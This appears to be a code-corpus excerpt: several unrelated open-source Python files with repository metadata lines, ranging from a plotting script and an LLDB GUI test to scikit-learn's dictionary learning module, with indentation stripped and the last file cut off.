arr=[]
for a in range(len(data)):
for b in range(len(data[a])):
if data[a][b] !=0:
arr.append([a+1,b+1,data[a][b]])
# print arr
for x in arr:
if x[2] == 2880:
plt.scatter(x[0],x[1])
print "scatter success: %d" % (x[0])
plt.show() | wyfzeqw/Environmental-Influence-on-Crowd-Dynamics | Project/plotter.py | Python | mit | 413 |
import gdata
import glob, math
from ige.ospace.Const import *
smallStarImgs = None
techImgs = None
bigStarImgs = None
planetImgs = None
cmdInProgressImg = None
loginLogoImg = None
structProblemImg = None
structOffImg = None
icons = {}
def getUnknownName():
return _('[Unknown]')
def getNA():
return _('N/A')
def formatTime(time):
time = int(math.ceil(time))
sign = ''
if time < 0:
time = - time
sign = '-'
days = time / 24
hours = time % 24
return '%s%d:%02d' % (sign, days, hours)
def formatBE(b, e):
return '%d / %d' % (b, e)
| mozts2005/OuterSpace | client-msg-wx/lib/res.py | Python | gpl-2.0 | 578 |
"""Configuration of clang-hook."""
from .stage import Str_to_stage
from .config import BaseConfig
from .filter import Filter
class HookConfig(BaseConfig):
"""Configuration of clang-hook."""
__slots__ = ("data", "load", "passes", "link_flags", "error_log", "info_log", "debug_log", "log", "output_file",
"output_stages", "report_file", "filters")
def __init__(self):
self.load = None
self.passes = None
self.link_flags = None
self.error_log = None
self.info_log = None
self.debug_log = None
self.log = None
self.output_file = None
self.output_stages = None
self.report_file = None
self.filters = None
super(HookConfig, self).__init__()
def init(self, info_logger, name=None, debug=False, arg_path=None):
"""Search the config file and parse it. For tests purposes, this function won't be called, allowing the test
suite to put arbitrary values in attributes."""
super(HookConfig, self).init(info_logger, "clang-hook" if name is None else name, debug, arg_path)
def parse_config(self):
"""Tells how to parse the dictionnary. Also define default values."""
self.load = self.data.get("load", [])
self.passes = self.data.get("passes", [])
self.link_flags = self.data.get("link_flags", [])
self.error_log = self.data.get("error_log", None)
self.info_log = self.data.get("info_log", None)
self.debug_log = self.data.get("debug_log", None)
self.log = bool(self.data.get("log", True))
self.output_file = self.data.get("output_file", None)
output_stages = self.data.get("output_stages", None)
if output_stages is not None:
self.output_stages = set(Str_to_stage(stage) for stage in output_stages)
else:
self.output_stages = None
self.report_file = self.data.get("report_file", None)
self.filters = [Filter(f) for f in self.data.get("filters", [])]
@classmethod
def get_config_path_variable(cls):
"""Returns the environment vartiable containing the path of the configuration file."""
return 'CLANG_HOOK_CONFIG'
| s-i-newton/clang-hook | lib_hook/hook_config.py | Python | apache-2.0 | 2,224 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv, fields
class account_analytic_cost_ledger(osv.osv_memory):
_name = 'account.analytic.cost.ledger'
_description = 'Account Analytic Cost Ledger'
_columns = {
'date1': fields.date('Start of period', required=True),
'date2': fields.date('End of period', required=True),
}
_defaults = {
'date1': lambda *a: time.strftime('%Y-01-01'),
'date2': lambda *a: time.strftime('%Y-%m-%d')
}
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = self.read(cr, uid, ids)[0]
datas = {
'ids': context.get('active_ids',[]),
'model': 'account.analytic.account',
'form': data
}
datas['form']['active_ids'] = context.get('active_ids', False)
return self.pool['report'].get_action(cr, uid, [], 'account.report_analyticcostledger', data=datas, context=context)
| addition-it-solutions/project-all | addons/analytic/wizard/account_analytic_cost_ledger_report.py | Python | agpl-3.0 | 1,959 |
# You have to perform N operations on a queue of the following types: E x : Enqueue x in the queue and
# print the new size of the queue. D : Dequeue from the queue and print the element that is deleted and
# the new size of the queue separated by a space. If there is no element in the queue, then print −1 in
# place of the deleted element.
#
# Input format
# First line: N
# Next N lines: One of the above operations
#
# Output format
# Enqueue operation: Print the new size of the queue
# Dequeue operation: Print two integers, the deleted element and the new size of the queue. If the queue is
# empty, print −1 and the new size of the queue.
#
# Constraints
# 1≤N≤100
# 1≤x≤100
#
# SAMPLE INPUT
# 5
# E 2
# D
# D
# E 3
# D
#
# SAMPLE OUTPUT
# 1
# 2 0
# -1 0
# 1
# 3 0
def enqueue(myList, element):
myList.insert(0, element)
def dequeue(myList):
if len(myList) > 0:
return myList.pop()
else:
return -1
myList = []
for _ in range(int(input())):
userInput = input().split()
if userInput[0] == 'E':
enqueue(myList, int(userInput[1]))
print(len(myList))
else:
deleted = dequeue(myList)
print(deleted, len(myList))
| OmkarPathak/Python-Programs | CompetitiveProgramming/HackerEarth/DataStructures/Queue/P01_Queue.py | Python | gpl-3.0 | 1,181 |
# Copyright (c) 2015-2018 Mark Hamilton, All rights reserved
"""
Provides general settings for testpool.
"""
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
##
# Location of the test database root directory.
TEST_DBSITE_DIR = os.path.abspath(os.path.join(BASE_DIR, "db"))
PLUGINS = {
'testpool.libexec',
}
##
# log formatting
FMT = '%(asctime)s:%(name)s:%(levelname)s:%(message)s'
CFG_FILE = "/etc/testpool/testpool.yml"
| testcraftsman/testpool | testpool/settings.py | Python | gpl-3.0 | 447 |
"""
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
class GuiViewLargeCommandTest(PExpectTest):
mydir = TestBase.compute_mydir(__file__)
# PExpect uses many timeouts internally and doesn't play well
# under ASAN on a loaded machine..
@skipIfAsan
@skipIfCursesSupportMissing
@skipIfRemote # "run" command will not work correctly for remote debug
def test_gui(self):
self.build()
# Limit columns to 80, so that long lines will not be displayed completely.
self.launch(executable=self.getBuildArtifact("a.out"), dimensions=(100,80))
self.expect('br set -f main.c -p "// Break here"', substrs=["Breakpoint 1", "address ="])
self.expect("run", substrs=["stop reason ="])
escape_key = chr(27).encode()
left_key = chr(27)+'OD' # for vt100 terminal (lldbexpect sets TERM=vt100)
right_key = chr(27)+'OC'
ctrl_l = chr(12)
# Start the GUI and close the welcome window.
self.child.sendline("gui")
self.child.send(escape_key)
# Check the sources window.
self.child.expect_exact("Sources")
# The string is copy&pasted from a 80-columns terminal. It will be followed by some
# kind of an escape sequence (color, frame, etc.).
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# The escape here checks that there's no content drawn by the previous line.
self.child.expect_exact("int shortvar = 1;"+chr(27))
# Check the triggered breakpoint marker on a long line.
self.child.expect_exact("<<< Thread 1: breakpoint 1.1"+chr(27))
# Check the variable window.
self.child.expect_exact("Variables")
self.child.expect_exact("(int) a_variable_with_a_very_looooooooooooooooooooooooooooooo"+chr(27))
self.child.expect_exact("(int) shortvar = 1"+chr(27))
# Scroll the sources view twice to the right.
self.child.send(right_key)
self.child.send(right_key)
# Force a redraw, otherwise curses will optimize the drawing to not draw all 'o'.
self.child.send(ctrl_l)
# The source code is indented by two spaces, so there'll be just two extra 'o' on the right.
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooooo"+chr(27))
# And scroll back to the left.
self.child.send(left_key)
self.child.send(left_key)
self.child.send(ctrl_l)
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# Press escape to quit the gui
self.child.send(escape_key)
self.expect_prompt()
self.quit()
| google/llvm-propeller | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | Python | apache-2.0 | 2,891 |
""" Dictionary learning
"""
from __future__ import print_function
# Author: Vlad Niculae, Gael Varoquaux, Alexandre Gramfort
# License: BSD 3 clause
import time
import sys
import itertools
from math import sqrt, floor, ceil
import numpy as np
from scipy import linalg
from numpy.lib.stride_tricks import as_strided
from ..base import BaseEstimator, TransformerMixin
from ..externals.joblib import Parallel, delayed, cpu_count
from ..externals.six.moves import zip
from ..utils import array2d, check_random_state, gen_even_slices
from ..utils.extmath import randomized_svd
from ..linear_model import Lasso, orthogonal_mp_gram, LassoLars, Lars
def _sparse_encode(X, dictionary, gram, cov=None, algorithm='lasso_lars',
regularization=None, copy_cov=True,
init=None, max_iter=1000):
"""Generic sparse coding
Each column of the result is the solution to a Lasso problem.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
dictionary: array of shape (n_components, n_features)
The dictionary matrix against which to solve the sparse coding of
the data. Some of the algorithms assume normalized rows.
gram: None | array, shape=(n_components, n_components)
Precomputed Gram matrix, dictionary * dictionary'
gram can be None if method is 'threshold'.
cov: array, shape=(n_components, n_samples)
Precomputed covariance, dictionary * X'
algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than regularization
from the projection dictionary * data'
regularization : int | float
The regularization parameter. It corresponds to alpha when
algorithm is 'lasso_lars', 'lasso_cd' or 'threshold'.
Otherwise it corresponds to n_nonzero_coefs.
init: array of shape (n_samples, n_components)
Initialization value of the sparse code. Only used if
`algorithm='lasso_cd'`.
max_iter: int, 1000 by default
Maximum number of iterations to perform if `algorithm='lasso_cd'`.
copy_cov: boolean, optional
Whether to copy the precomputed covariance matrix; if False, it may be
overwritten.
Returns
-------
code: array of shape (n_components, n_features)
The sparse codes
See also
--------
sklearn.linear_model.lars_path
sklearn.linear_model.orthogonal_mp
sklearn.linear_model.Lasso
SparseCoder
"""
if X.ndim == 1:
X = X[:, np.newaxis]
n_samples, n_features = X.shape
if cov is None and algorithm != 'lasso_cd':
# overwriting cov is safe
copy_cov = False
cov = np.dot(dictionary, X.T)
if algorithm == 'lasso_lars':
alpha = float(regularization) / n_features # account for scaling
try:
err_mgt = np.seterr(all='ignore')
lasso_lars = LassoLars(alpha=alpha, fit_intercept=False,
verbose=False, normalize=False,
precompute=gram, fit_path=False)
lasso_lars.fit(dictionary.T, X.T, Xy=cov)
new_code = lasso_lars.coef_
finally:
np.seterr(**err_mgt)
elif algorithm == 'lasso_cd':
alpha = float(regularization) / n_features # account for scaling
clf = Lasso(alpha=alpha, fit_intercept=False, precompute=gram,
max_iter=max_iter, warm_start=True)
clf.coef_ = init
clf.fit(dictionary.T, X.T)
new_code = clf.coef_
elif algorithm == 'lars':
try:
err_mgt = np.seterr(all='ignore')
lars = Lars(fit_intercept=False, verbose=False, normalize=False,
precompute=gram, n_nonzero_coefs=int(regularization),
fit_path=False)
lars.fit(dictionary.T, X.T, Xy=cov)
new_code = lars.coef_
finally:
np.seterr(**err_mgt)
elif algorithm == 'threshold':
new_code = ((np.sign(cov) *
np.maximum(np.abs(cov) - regularization, 0)).T)
elif algorithm == 'omp':
norms_squared = np.sum((X ** 2), axis=1)
new_code = orthogonal_mp_gram(gram, cov, regularization, None,
norms_squared, copy_Xy=copy_cov).T
else:
raise ValueError('Sparse coding method must be "lasso_lars" '
'"lasso_cd", "lasso", "threshold" or "omp", got %s.'
% algorithm)
return new_code
# XXX : could be moved to the linear_model module
def sparse_encode(X, dictionary, gram=None, cov=None, algorithm='lasso_lars',
n_nonzero_coefs=None, alpha=None, copy_cov=True, init=None,
max_iter=1000, n_jobs=1):
"""Sparse coding
Each row of the result is the solution to a sparse coding problem.
The goal is to find a sparse array `code` such that::
X ~= code * dictionary
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix
dictionary: array of shape (n_components, n_features)
The dictionary matrix against which to solve the sparse coding of
the data. Some of the algorithms assume normalized rows for meaningful
output.
gram: array, shape=(n_components, n_components)
Precomputed Gram matrix, dictionary * dictionary'
cov: array, shape=(n_components, n_samples)
Precomputed covariance, dictionary' * X
algorithm: {'lasso_lars', 'lasso_cd', 'lars', 'omp', 'threshold'}
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection dictionary * X'
n_nonzero_coefs: int, 0.1 * n_features by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
alpha: float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threhold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
init: array of shape (n_samples, n_components)
Initialization value of the sparse codes. Only used if
`algorithm='lasso_cd'`.
max_iter: int, 1000 by default
Maximum number of iterations to perform if `algorithm='lasso_cd'`.
copy_cov: boolean, optional
Whether to copy the precomputed covariance matrix; if False, it may be
overwritten.
n_jobs: int, optional
Number of parallel jobs to run.
Returns
-------
code: array of shape (n_samples, n_components)
The sparse codes
See also
--------
sklearn.linear_model.lars_path
sklearn.linear_model.orthogonal_mp
sklearn.linear_model.Lasso
SparseCoder
"""
dictionary = array2d(dictionary)
X = array2d(X)
n_samples, n_features = X.shape
n_components = dictionary.shape[0]
if gram is None and algorithm != 'threshold':
gram = np.dot(dictionary, dictionary.T)
if cov is None:
copy_cov = False
cov = np.dot(dictionary, X.T)
if algorithm in ('lars', 'omp'):
regularization = n_nonzero_coefs
if regularization is None:
regularization = max(n_features / 10, 1)
else:
regularization = alpha
if regularization is None:
regularization = 1.
if n_jobs == 1 or algorithm == 'threshold':
return _sparse_encode(X, dictionary, gram, cov=cov,
algorithm=algorithm,
regularization=regularization, copy_cov=copy_cov,
init=init, max_iter=max_iter)
# Enter parallel code block
code = np.empty((n_samples, n_components))
slices = list(gen_even_slices(n_samples, n_jobs))
code_views = Parallel(n_jobs=n_jobs)(
delayed(_sparse_encode)(
X[this_slice], dictionary, gram, cov[:, this_slice], algorithm,
regularization=regularization, copy_cov=copy_cov,
init=init[this_slice] if init is not None else None,
max_iter=max_iter)
for this_slice in slices)
for this_slice, this_view in zip(slices, code_views):
code[this_slice] = this_view
return code
def _update_dict(dictionary, Y, code, verbose=False, return_r2=False,
random_state=None):
"""Update the dense dictionary factor in place.
Parameters
----------
dictionary: array of shape (n_features, n_components)
Value of the dictionary at the previous iteration.
Y: array of shape (n_features, n_samples)
Data matrix.
code: array of shape (n_components, n_samples)
Sparse coding of the data against which to optimize the dictionary.
verbose:
Degree of output the procedure will print.
return_r2: bool
Whether to compute and return the residual sum of squares corresponding
to the computed solution.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
dictionary: array of shape (n_features, n_components)
Updated dictionary.
"""
n_components = len(code)
n_samples = Y.shape[0]
random_state = check_random_state(random_state)
# Residuals, computed 'in-place' for efficiency
R = -np.dot(dictionary, code)
R += Y
R = np.asfortranarray(R)
ger, = linalg.get_blas_funcs(('ger',), (dictionary, code))
for k in range(n_components):
# R <- 1.0 * U_k * V_k^T + R
R = ger(1.0, dictionary[:, k], code[k, :], a=R, overwrite_a=True)
dictionary[:, k] = np.dot(R, code[k, :].T)
# Scale k'th atom
atom_norm_square = np.dot(dictionary[:, k], dictionary[:, k])
if atom_norm_square < 1e-20:
if verbose == 1:
sys.stdout.write("+")
sys.stdout.flush()
elif verbose:
print("Adding new random atom")
dictionary[:, k] = random_state.randn(n_samples)
# Setting corresponding coefs to 0
code[k, :] = 0.0
dictionary[:, k] /= sqrt(np.dot(dictionary[:, k],
dictionary[:, k]))
else:
dictionary[:, k] /= sqrt(atom_norm_square)
# R <- -1.0 * U_k * V_k^T + R
R = ger(-1.0, dictionary[:, k], code[k, :], a=R, overwrite_a=True)
if return_r2:
R **= 2
# R is fortran-ordered. For numpy version < 1.6, sum does not
# follow the quick striding first, and is thus inefficient on
# fortran ordered data. We take a flat view of the data with no
# striding
R = as_strided(R, shape=(R.size, ), strides=(R.dtype.itemsize,))
R = np.sum(R)
return dictionary, R
return dictionary
def dict_learning(X, n_components, alpha, max_iter=100, tol=1e-8,
method='lars', n_jobs=1, dict_init=None, code_init=None,
callback=None, verbose=False, random_state=None):
"""Solves a dictionary learning matrix factorization problem.
Finds the best dictionary and the corresponding sparse code for
approximating the data matrix X by solving::
(U^*, V^*) = argmin 0.5 || X - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
where V is the dictionary and U is the sparse code.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
n_components: int,
Number of dictionary atoms to extract.
alpha: int,
Sparsity controlling parameter.
max_iter: int,
Maximum number of iterations to perform.
tol: float,
Tolerance for the stopping condition.
method: {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
n_jobs: int,
Number of parallel jobs to run, or -1 to autodetect.
dict_init: array of shape (n_components, n_features),
Initial value for the dictionary for warm restart scenarios.
code_init: array of shape (n_samples, n_components),
Initial value for the sparse code for warm restart scenarios.
callback:
Callable that gets invoked every five iterations.
verbose:
Degree of output the procedure will print.
random_state: int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
code: array of shape (n_samples, n_components)
The sparse code factor in the matrix factorization.
dictionary: array of shape (n_components, n_features),
The dictionary factor in the matrix factorization.
errors: array
Vector of errors at each iteration.
See also
--------
dict_learning_online
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
if method not in ('lars', 'cd'):
raise ValueError('Coding method %r not supported as a fit algorithm.'
% method)
method = 'lasso_' + method
t0 = time.time()
# Avoid integer division problems
alpha = float(alpha)
random_state = check_random_state(random_state)
if n_jobs == -1:
n_jobs = cpu_count()
# Init the code and the dictionary with SVD of Y
if code_init is not None and dict_init is not None:
code = np.array(code_init, order='F')
# Don't copy V, it will happen below
dictionary = dict_init
else:
code, S, dictionary = linalg.svd(X, full_matrices=False)
dictionary = S[:, np.newaxis] * dictionary
r = len(dictionary)
if n_components <= r: # True even if n_components=None
code = code[:, :n_components]
dictionary = dictionary[:n_components, :]
else:
code = np.c_[code, np.zeros((len(code), n_components - r))]
dictionary = np.r_[dictionary,
np.zeros((n_components - r, dictionary.shape[1]))]
# Fortran-order dict, as we are going to access its row vectors
dictionary = np.array(dictionary, order='F')
residuals = 0
errors = []
current_cost = np.nan
if verbose == 1:
print('[dict_learning]', end=' ')
for ii in range(max_iter):
dt = (time.time() - t0)
if verbose == 1:
sys.stdout.write(".")
sys.stdout.flush()
elif verbose:
print ("Iteration % 3i "
"(elapsed time: % 3is, % 4.1fmn, current cost % 7.3f)"
% (ii, dt, dt / 60, current_cost))
# Update code
code = sparse_encode(X, dictionary, algorithm=method, alpha=alpha,
init=code, n_jobs=n_jobs)
# Update dictionary
dictionary, residuals = _update_dict(dictionary.T, X.T, code.T,
verbose=verbose, return_r2=True,
random_state=random_state)
dictionary = dictionary.T
# Cost function
current_cost = 0.5 * residuals + alpha * np.sum(np.abs(code))
errors.append(current_cost)
if ii > 0:
dE = errors[-2] - errors[-1]
# assert(dE >= -tol * errors[-1])
if dE < tol * errors[-1]:
if verbose == 1:
# A line return
print("")
elif verbose:
print("--- Convergence reached after %d iterations" % ii)
break
if ii % 5 == 0 and callback is not None:
callback(locals())
return code, dictionary, errors
def dict_learning_online(X, n_components=2, alpha=1, n_iter=100,
return_code=True, dict_init=None, callback=None,
batch_size=3, verbose=False, shuffle=True, n_jobs=1,
method='lars', iter_offset=0, random_state=None):
"""Solves a dictionary learning matrix factorization problem online.
Finds the best dictionary and the corresponding sparse code for
approximating the data matrix X by solving::
(U^*, V^*) = argmin 0.5 || X - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
where V is the dictionary and U is the sparse code. This is
accomplished by repeatedly iterating over mini-batches by slicing
the input data.
Parameters
----------
X: array of shape (n_samples, n_features)
Data matrix.
n_components : int,
Number of dictionary atoms to extract.
alpha : int,
Sparsity controlling parameter.
n_iter : int,
Number of iterations to perform.
return_code : boolean,
Whether to also return the code U or just the dictionary V.
dict_init : array of shape (n_components, n_features),
Initial value for the dictionary for warm restart scenarios.
callback :
Callable that gets invoked every five iterations.
batch_size : int,
The number of samples to take in each batch.
verbose :
Degree of output the procedure will print.
shuffle : boolean,
Whether to shuffle the data before splitting it in batches.
n_jobs : int,
Number of parallel jobs to run, or -1 to autodetect.
method : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
iter_offset : int, default 0
Number of previous iterations completed on the dictionary used for
initialization.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Returns
-------
code : array of shape (n_samples, n_components),
the sparse code (only returned if `return_code=True`)
dictionary : array of shape (n_components, n_features),
the solutions to the dictionary learning problem
See also
--------
dict_learning
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
if method not in ('lars', 'cd'):
raise ValueError('Coding method not supported as a fit algorithm.')
method = 'lasso_' + method
t0 = time.time()
n_samples, n_features = X.shape
# Avoid integer division problems
alpha = float(alpha)
random_state = check_random_state(random_state)
if n_jobs == -1:
n_jobs = cpu_count()
# Init V with SVD of X
if dict_init is not None:
dictionary = dict_init
else:
_, S, dictionary = randomized_svd(X, n_components)
dictionary = S[:, np.newaxis] * dictionary
r = len(dictionary)
if n_components <= r:
dictionary = dictionary[:n_components, :]
else:
dictionary = np.r_[dictionary,
np.zeros((n_components - r, dictionary.shape[1]))]
dictionary = np.ascontiguousarray(dictionary.T)
if verbose == 1:
print('[dict_learning]', end=' ')
n_batches = floor(float(len(X)) / batch_size)
if shuffle:
X_train = X.copy()
random_state.shuffle(X_train)
else:
X_train = X
batches = np.array_split(X_train, n_batches)
batches = itertools.cycle(batches)
# The covariance of the dictionary
A = np.zeros((n_components, n_components))
# The data approximation
B = np.zeros((n_features, n_components))
for ii, this_X in zip(range(iter_offset, iter_offset + n_iter), batches):
dt = (time.time() - t0)
if verbose == 1:
sys.stdout.write(".")
sys.stdout.flush()
elif verbose:
if verbose > 10 or ii % ceil(100. / verbose) == 0:
print ("Iteration % 3i (elapsed time: % 3is, % 4.1fmn)"
% (ii, dt, dt / 60))
this_code = sparse_encode(this_X, dictionary.T, algorithm=method,
alpha=alpha).T
# Update the auxiliary variables
if ii < batch_size - 1:
theta = float((ii + 1) * batch_size)
else:
theta = float(batch_size ** 2 + ii + 1 - batch_size)
beta = (theta + 1 - batch_size) / (theta + 1)
A *= beta
A += np.dot(this_code, this_code.T)
B *= beta
B += np.dot(this_X.T, this_code.T)
# Update dictionary
dictionary = _update_dict(dictionary, B, A, verbose=verbose,
random_state=random_state)
# XXX: Can the residuals be of any use?
# Maybe we need a stopping criteria based on the amount of
# modification in the dictionary
if callback is not None:
callback(locals())
if return_code:
if verbose > 1:
print('Learning code...', end=' ')
elif verbose == 1:
print('|', end=' ')
code = sparse_encode(X, dictionary.T, algorithm=method, alpha=alpha,
n_jobs=n_jobs)
if verbose > 1:
dt = (time.time() - t0)
print('done (total time: % 3is, % 4.1fmn)' % (dt, dt / 60))
return code, dictionary.T
return dictionary.T
class SparseCodingMixin(TransformerMixin):
"""Sparse coding mixin"""
def _set_sparse_coding_params(self, n_components,
transform_algorithm='omp',
transform_n_nonzero_coefs=None,
transform_alpha=None, split_sign=False,
n_jobs=1):
self.n_components = n_components
self.transform_algorithm = transform_algorithm
self.transform_n_nonzero_coefs = transform_n_nonzero_coefs
self.transform_alpha = transform_alpha
self.split_sign = split_sign
self.n_jobs = n_jobs
def transform(self, X, y=None):
"""Encode the data as a sparse combination of the dictionary atoms.
Coding method is determined by the object parameter
`transform_algorithm`.
Parameters
----------
X : array of shape (n_samples, n_features)
Test data to be transformed, must have the same number of
features as the data used to train the model.
Returns
-------
X_new : array, shape (n_samples, n_components)
Transformed data
"""
# XXX : kwargs is not documented
X = array2d(X)
n_samples, n_features = X.shape
code = sparse_encode(
X, self.components_, algorithm=self.transform_algorithm,
n_nonzero_coefs=self.transform_n_nonzero_coefs,
alpha=self.transform_alpha, n_jobs=self.n_jobs)
if self.split_sign:
# feature vector is split into a positive and negative side
n_samples, n_features = code.shape
split_code = np.empty((n_samples, 2 * n_features))
split_code[:, :n_features] = np.maximum(code, 0)
split_code[:, n_features:] = -np.minimum(code, 0)
code = split_code
return code
class SparseCoder(BaseEstimator, SparseCodingMixin):
"""Sparse coding
Finds a sparse representation of data against a fixed, precomputed
dictionary.
Each row of the result is the solution to a sparse coding problem.
The goal is to find a sparse array `code` such that::
X ~= code * dictionary
Parameters
----------
dictionary : array, [n_components, n_features]
The dictionary atoms used for sparse coding. Lines are assumed to be
normalized to unit norm.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data:
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection ``dictionary * X'``
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
Attributes
----------
`components_` : array, [n_components, n_features]
The unchanged dictionary atoms
See also
--------
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
sparse_encode
"""
def __init__(self, dictionary, transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
split_sign=False, n_jobs=1):
self._set_sparse_coding_params(dictionary.shape[0],
transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.components_ = dictionary
def fit(self, X, y=None):
"""Do nothing and return the estimator unchanged
This method is just there to implement the usual API and hence
work in pipelines.
"""
return self
class DictionaryLearning(BaseEstimator, SparseCodingMixin):
"""Dictionary learning
Finds a dictionary (a set of atoms) that can best be used to represent data
using a sparse code.
Solves the optimization problem::
(U^*,V^*) = argmin 0.5 || Y - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
Parameters
----------
n_components : int,
number of dictionary elements to extract
alpha : int,
sparsity controlling parameter
max_iter : int,
maximum number of iterations to perform
tol : float,
tolerance for numerical error
fit_algorithm : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection ``dictionary * X'``
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
code_init : array of shape (n_samples, n_components),
initial value for the code, for warm restart
dict_init : array of shape (n_components, n_features),
initial values for the dictionary, for warm restart
verbose :
degree of verbosity of the printed output
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
`components_` : array, [n_components, n_features]
dictionary atoms extracted from the data
`error_` : array
vector of errors at each iteration
Notes
-----
**References:**
J. Mairal, F. Bach, J. Ponce, G. Sapiro, 2009: Online dictionary learning
for sparse coding (http://www.di.ens.fr/sierra/pdfs/icml09.pdf)
See also
--------
SparseCoder
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
def __init__(self, n_components=None, alpha=1, max_iter=1000, tol=1e-8,
